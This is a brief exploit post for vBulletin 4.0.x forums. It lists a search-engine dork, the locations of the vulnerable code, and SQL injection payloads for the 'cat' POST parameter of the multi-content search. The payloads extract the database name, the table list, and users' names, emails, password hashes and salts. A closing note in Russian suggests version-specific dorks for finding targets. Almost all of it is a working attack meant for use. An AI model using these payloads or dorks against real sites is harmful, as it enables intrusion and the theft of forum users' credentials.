Version: 4.0.x Dork : inurl:"search.php?search_type=1" -------------------------- # ~Vulnerable Codes~ # -------------------------- /vb/search/searchtools.php - line 715; /packages/vbforum/search/type/socialgroup.php - line 201:203; -------------------------- # ~Exploit~ # -------------------------- POST data on "Search Multiple Content Types" => "groups" &cat[0]=1) UNION SELECT database()# &cat[0]=1) UNION SELECT table_name FROM information_schema.tables# &cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#
Правильные дорки: "Powered by vBulletin™ Version 4.0.8" "Powered by vBulletin™ Version 4.1.12" "Powered by vBulletin™ Version 4.0.2" и пр. Так будет проще найти